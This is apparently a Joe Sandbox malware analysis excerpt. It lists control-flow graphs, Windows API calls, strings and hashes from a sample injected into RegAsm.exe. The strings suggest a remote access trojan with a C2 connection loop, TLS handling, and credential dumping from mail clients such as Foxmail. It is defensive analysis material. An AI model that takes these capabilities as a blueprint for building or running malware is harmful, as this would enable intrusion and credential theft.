                                                                                                                            control_flow_graph 494 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 507 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 494->507 508 414f74-414f7b Sleep 494->508 523 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->523 524 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->524 508->507 577 4150ec-4150f3 523->577 578 4150de-4150ea 523->578 524->523 579 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 577->579 578->579 606 4151d5-4151e3 call 40482d 579->606 607 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 579->607 613 415210-415225 call 404f51 call 4048c8 606->613 614 4151e5-41520b call 402093 * 2 call 41b4ef 606->614 629 415aa3-415ab5 call 404e26 call 4021fa 607->629 613->629 630 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 613->630 614->629 642 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 629->642 643 415add-415ae5 call 401e8d 629->643 694 415380-41538d call 405aa6 630->694 695 415392-4153b9 call 401fab call 4135a6 630->695 642->643 643->523 694->695 701 4153c0-415485 call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 695->701 702 4153bb-4153bd 695->702 725 41548a-415a16 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 701->725 702->701 948 415a18-415a1f 725->948 949 415a2a-415a31 725->949 948->949 950 415a21-415a23 948->950 951 415a33-415a38 call 40b051 949->951 952 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 949->952 950->949 951->952 963 415a71-415a7d CreateThread 952->963 964 415a83-415a9e call 401fd8 * 2 call 401f09 952->964 963->964 964->629
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                                                                                                            • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                                                                                                            • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                                                                                                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep$ErrorLastLocalTime
                                                                                                                            • String ID: | $%I64u$5.0.0 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$Rmc-43JG4A$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                                                                                            • API String ID: 524882891-292389326
                                                                                                                            • Opcode ID: 0d1d29d76dc518732eb27e3fd12ea1f5208556d1c62b2365b17fa8cae96396da
                                                                                                                            • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                                                                                                            • Opcode Fuzzy Hash: 0d1d29d76dc518732eb27e3fd12ea1f5208556d1c62b2365b17fa8cae96396da
                                                                                                                            • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 971 412ab4-412afd GetModuleFileNameW call 4020df * 3 978 412aff-412b89 call 41b978 call 401fab call 40d9e8 call 401fd8 call 41b978 call 401fab call 40d9e8 call 401fd8 call 41b978 call 401fab call 40d9e8 call 401fd8 971->978 1003 412b8b-412c1b call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 978->1003 1026 412c2b 1003->1026 1027 412c1d-412c25 Sleep 1003->1027 1028 412c2d-412cbd call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 1026->1028 1027->1003 1027->1026 1051 412ccd 1028->1051 1052 412cbf-412cc7 Sleep 1028->1052 1053 412ccf-412d5f call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 1051->1053 1052->1028 1052->1051 1076 412d61-412d69 Sleep 1053->1076 1077 412d6f-412d94 1053->1077 1076->1053 1076->1077 1078 412d98-412db4 call 401f04 call 41c485 1077->1078 1083 412db6-412dc5 call 401f04 DeleteFileW 1078->1083 1084 412dcb-412de7 call 401f04 call 41c485 1078->1084 1083->1084 1091 412e04 1084->1091 1092 412de9-412e02 call 401f04 DeleteFileW 1084->1092 1094 412e08-412e24 call 401f04 call 41c485 1091->1094 1092->1094 1100 412e26-412e38 call 401f04 DeleteFileW 1094->1100 1101 412e3e-412e40 1094->1101 1100->1101 1103 412e42-412e44 1101->1103 1104 412e4d-412e58 Sleep 1101->1104 1103->1104 1106 412e46-412e4b 1103->1106 1104->1078 1107 412e5e-412e70 call 406b28 1104->1107 1106->1104 1106->1107 1110 412e72-412e80 call 406b28 1107->1110 1111 412ec6-412ee5 call 401f09 * 3 1107->1111 1110->1111 1117 412e82-412e90 call 406b28 1110->1117 1122 412eea-412f23 call 40b904 call 401f04 call 4020f6 call 41322d 1111->1122 1117->1111 1123 412e92-412ebe Sleep call 401f09 * 3 1117->1123 1138 412f28-412f4e call 401f09 call 405b05 1122->1138 1123->978 1137 412ec4 1123->1137 1137->1122 1143 412f54-4130a3 call 41bd1e call 41bb8e call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1138->1143 1144 4130a8-4131a1 call 41bd1e call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1138->1144 1213 4131a5-41322c call 401fd8 call 401f09 call 401fd8 * 9 1143->1213 1144->1213
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                                                                                                              • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63691986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                                                                              • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                                                                                              • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                                                                                                            • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                                                                                                            • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                                                                                                            • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                                                                                                            • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                                                                                                            • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                                                                                                            • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                                                                                                            • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                                                                                                            • Sleep.KERNEL32(00000064), ref: 00412E94
                                                                                                                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                            • String ID: /stext "$0TG$0TG$NG$NG
                                                                                                                            • API String ID: 1223786279-2576077980
                                                                                                                            • Opcode ID: a3e4588368dc361879887a441bb748d6724ab2a1b1b1c5207810e9d07ad68737
                                                                                                                            • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                                                                                                            • Opcode Fuzzy Hash: a3e4588368dc361879887a441bb748d6724ab2a1b1b1c5207810e9d07ad68737
                                                                                                                            • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                              • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                              • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                              • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                              • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                            • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                            • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                            • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                            • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                            • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                            • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                            • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                            • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                            • String ID: )$Foxmail$ProgramFiles
                                                                                                                            • API String ID: 672098462-2938083778
                                                                                                                            • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                            • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                            • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                            • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1286 414d86-414dc2 1287 414dc8-414ddd GetSystemDirectoryA 1286->1287 1288 414edd-414ee8 1286->1288 1289 414ed3 1287->1289 1290 414de3-414e2f call 441a3e call 441a98 LoadLibraryA 1287->1290 1289->1288 1295 414e31-414e3b GetProcAddress 1290->1295 1296 414e46-414e80 call 441a3e call 441a98 LoadLibraryA 1290->1296 1297 414e42-414e44 1295->1297 1298 414e3d-414e40 FreeLibrary 1295->1298 1307 414e82-414e8c GetProcAddress 1296->1307 1308 414ecf-414ed2 1296->1308 1297->1296 1301 414e97 1297->1301 1298->1297 1303 414e99-414eaa GetProcAddress 1301->1303 1305 414eb4-414eb7 FreeLibrary 1303->1305 1306 414eac-414eb0 1303->1306 1310 414eb9-414ebb 1305->1310 1306->1303 1309 414eb2 1306->1309 1311 414e93-414e95 1307->1311 1312 414e8e-414e91 FreeLibrary 1307->1312 1308->1289 1309->1310 1310->1308 1313 414ebd-414ecd 1310->1313 1311->1301 1311->1308 1312->1311 1313->1308 1313->1313
                                                                                                                            APIs
                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                            • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                            • API String ID: 2490988753-744132762
                                                                                                                            • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                                                                                            • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                                                                                                            • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                                                                                            • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1314 4048c8-4048e8 connect 1315 404a1b-404a1f 1314->1315 1316 4048ee-4048f1 1314->1316 1319 404a21-404a2f WSAGetLastError 1315->1319 1320 404a97 1315->1320 1317 404a17-404a19 1316->1317 1318 4048f7-4048fa 1316->1318 1321 404a99-404a9e 1317->1321 1322 404926-404930 call 420c60 1318->1322 1323 4048fc-404923 call 40531e call 402093 call 41b4ef 1318->1323 1319->1320 1324 404a31-404a34 1319->1324 1320->1321 1335 404941-40494e call 420e8f 1322->1335 1336 404932-40493c 1322->1336 1323->1322 1325 404a71-404a76 1324->1325 1326 404a36-404a6f call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 1324->1326 1331 404a7b-404a94 call 402093 * 2 call 41b4ef 1325->1331 1326->1320 1331->1320 1349 404950-404973 call 402093 * 2 call 41b4ef 1335->1349 1350 404987-404992 call 421a40 1335->1350 1336->1331 1375 404976-404982 call 420ca0 1349->1375 1360 4049c4-4049d1 call 420e06 1350->1360 1361 404994-4049c2 call 402093 * 2 call 41b4ef call 4210b2 1350->1361 1372 4049d3-4049f6 call 402093 * 2 call 41b4ef 1360->1372 1373 4049f9-404a14 CreateEventW * 2 1360->1373 1361->1375 1372->1373 1373->1317 1375->1320
                                                                                                                            APIs
                                                                                                                            • connect.WS2_32(FFFFFFFF,01ED4948,00000010), ref: 004048E0
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                                            • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                            • API String ID: 994465650-2151626615
                                                                                                                            • Opcode ID: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
                                                                                                                            • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                                                                                                            • Opcode Fuzzy Hash: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
                                                                                                                            • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                                            • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3658366068-0
                                                                                                                            • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                                                                                            • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                                                                                                            • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                                                                                            • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1406 40da34-40da59 call 401f86 1409 40db83-40dc1b call 401f04 GetLongPathNameW call 40417e * 2 call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1406->1409 1410 40da5f 1406->1410 1412 40da70-40da7e call 41b5b4 call 401f13 1410->1412 1413 40da91-40da96 1410->1413 1414 40db51-40db56 1410->1414 1415 40daa5-40daac call 41bfb7 1410->1415 1416 40da66-40da6b 1410->1416 1417 40db58-40db5d 1410->1417 1418 40da9b-40daa0 1410->1418 1419 40db6e 1410->1419 1420 40db5f-40db64 call 43c0cf 1410->1420 1437 40da83 1412->1437 1422 40db73-40db78 call 43c0cf 1413->1422 1414->1422 1434 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1415->1434 1435 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1415->1435 1416->1422 1417->1422 1418->1422 1419->1422 1430 40db69-40db6c 1420->1430 1436 40db79-40db7e call 409057 1422->1436 1430->1419 1430->1436 1434->1437 1442 40da87-40da8c call 401f09 1435->1442 1436->1409 1437->1442 1442->1409
                                                                                                                            APIs
                                                                                                                            • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DB9A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LongNamePath
                                                                                                                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                            • API String ID: 82841172-425784914
                                                                                                                            • Opcode ID: d5af02d33e376a7b237a9cdb7674b417df9d4ecade9ec5cfff040e37113fa090
                                                                                                                            • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                                                                                                            • Opcode Fuzzy Hash: d5af02d33e376a7b237a9cdb7674b417df9d4ecade9ec5cfff040e37113fa090
                                                                                                                            • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1542 44ac49-44ac62 1543 44ac64-44ac74 call 446766 1542->1543 1544 44ac78-44ac7d 1542->1544 1543->1544 1552 44ac76 1543->1552 1546 44ac7f-44ac87 1544->1546 1547 44ac8a-44acae MultiByteToWideChar 1544->1547 1546->1547 1549 44acb4-44acc0 1547->1549 1550 44ae41-44ae54 call 434fcb 1547->1550 1553 44ad14 1549->1553 1554 44acc2-44acd3 1549->1554 1552->1544 1558 44ad16-44ad18 1553->1558 1555 44acd5-44ace4 call 457190 1554->1555 1556 44acf2-44ad03 call 446137 1554->1556 1561 44ae36 1555->1561 1567 44acea-44acf0 1555->1567 1556->1561 1568 44ad09 1556->1568 1558->1561 1562 44ad1e-44ad31 MultiByteToWideChar 1558->1562 1566 44ae38-44ae3f call 435e40 1561->1566 1562->1561 1565 44ad37-44ad49 call 448bb3 1562->1565 1572 44ad4e-44ad52 1565->1572 1566->1550 1571 44ad0f-44ad12 1567->1571 1568->1571 1571->1558 1572->1561 1574 44ad58-44ad5f 1572->1574 1575 44ad61-44ad66 1574->1575 1576 44ad99-44ada5 1574->1576 1575->1566 1577 44ad6c-44ad6e 1575->1577 1578 44ada7-44adb8 1576->1578 1579 44adf1 1576->1579 1577->1561 1580 44ad74-44ad8e call 448bb3 1577->1580 1582 44add3-44ade4 call 446137 1578->1582 1583 44adba-44adc9 call 457190 1578->1583 1581 44adf3-44adf5 1579->1581 1580->1566 1594 44ad94 1580->1594 1585 44adf7-44ae10 call 448bb3 1581->1585 1586 44ae2f-44ae35 call 435e40 1581->1586 1582->1586 1598 44ade6 1582->1598 1583->1586 1597 44adcb-44add1 1583->1597 1585->1586 1600 44ae12-44ae19 1585->1600 1586->1561 1594->1561 1599 44adec-44adef 1597->1599 1598->1599 1599->1581 1601 44ae55-44ae5b 1600->1601 1602 44ae1b-44ae1c 1600->1602 1603 44ae1d-44ae2d WideCharToMultiByte 1601->1603 1602->1603 1603->1586 1604 44ae5d-44ae64 call 435e40 1603->1604 1604->1566
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                                                                                                            • __freea.LIBCMT ref: 0044AE30
                                                                                                                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                            • __freea.LIBCMT ref: 0044AE39
                                                                                                                            • __freea.LIBCMT ref: 0044AE5E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3864826663-0
                                                                                                                            • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                                                                                                            • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                                                                                                            • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                                                                                                            • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
